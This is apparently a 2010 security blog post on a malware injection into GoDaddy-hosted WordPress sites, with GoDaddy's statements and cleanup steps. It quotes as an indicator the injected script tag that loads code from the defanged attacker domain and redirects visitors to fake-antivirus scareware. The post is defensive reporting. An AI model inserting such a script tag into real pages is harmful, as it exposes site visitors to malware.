On September 17, 2010, numerous websites hosted at GoDaddy, including WordPress blogs, were hacked with myblindstudioinfoonline[dot]com malware.
Affected websites got injected with a long malicious script located at the top of .php files and may contain something like base64_decode
This malicious code generates a hidden script on website pages: <script src=”http://myblindstudioinfoonline[dot]com/ll.php”></script>, which redirects visitors to another website.
The redirect site is a fake AV (anti-virus) scam, also known as “scareware.” This scareware tries to trick the visitor into thinking their computer is infected and offers a “download” solution. Unfortunately, this solution is a VIRUS!
On the morning of September 18, 2010, we reached out to GoDaddy for you. They informed us that their Security Team was already working diligently to identify the cause and resolve this issue. By 2:43pm CST, Go Daddy released their first statement advising all customers who believe they have a problem to change their FTP passwords and fill out their security submission form.
On September 19, 2010 at 9 pm CST, we received a new statement from Go Daddy that they've cleaned and restored all affected websites:
The exploit affecting PHP files on several Go Daddy accounts this past weekend has been resolved.
Go Daddy's Security Team worked quickly to clean and restore all affected sites. The exploit was caused by malicious files uploaded via FTP to customer websites.
As a good security practice, Go Daddy recommends all customers change their FTP passwords on a regular basis. To modify your FTP password please follow the steps provided in our help documentation at http://help.godaddy.com/article/6.
As always, Go Daddy's Security Team is here for you. If you ever suspect your site is under attack, please fill out our security submission form, located here – http://www.godaddy.com/securityissue – and notify Go Daddy's 24/7 Customer Support.
Go Daddy Chief Information Security Officer
Go Daddy has advised that they will continue to closely monitor the environment.
At this time, it's still unclear whether other websites hosted elsewhere have been affected. If you know someone hosted elsewhere that experienced this malware, please leave a comment below.
The domain name myblindstudioinfoonline[dot]com is registered to Hilary Kneber. This registrar is not an unfamiliar name. It's the same registrar from mass attacks across numerous major hosting companies in May, 2010. Hilary Kneber is registered to 407 other domain names and I don't think we've seen the last of them yet.
Stay proactive! Monitor your website 24/7 with Sucuri Web Integrity Monitoring. It's what we use and recommend to all webmasters. Use our discounted affiliate link and save: https://wpsecuritylock.com/sucuri.
Warning: If you've had a FTP breach, please do the following immediately!
- Change all of your FTP passwords (Check to see if you have more than one FTP account).
- Change your database passwords (If hackers got into your FTP, did they look at your wp-config.php file?).
- Change your Authentication Unique Keys and Salts (Again, wp-config.php).
- Change your WordPress username passwords (Change any “administrator” account passwords for safety measures).
- Check your permissions on your server. Make sure your directories (folders) are set to 755 and your files are set to 644 (Sometimes hackers like to change CHMOD permissions while they're in there).
For more info about myblindstudioinfoonline malware, read our previous post.
Was your WordPress site hacked but fixed and still looks funny?
Many times, WordPress users ask me why their wp-admin “Dashboard” still looks strange after it's been fixed. The answer is you need to clean your browser cookies and cache.
09-20-2010 – We'd like to send a big thank you to Rich Dougan for pointing out a typo on this post from we hacked to were hacked. We've have now updated that paragraph. We're here to slap hackers and help protect your websites. Your rock Rich!
We'd love your feedback
If you found this post helpful or have any questions or feedback, leave your comment below.
P.S. Help spread awareness by telling others, share this article on Twitter and Facebook.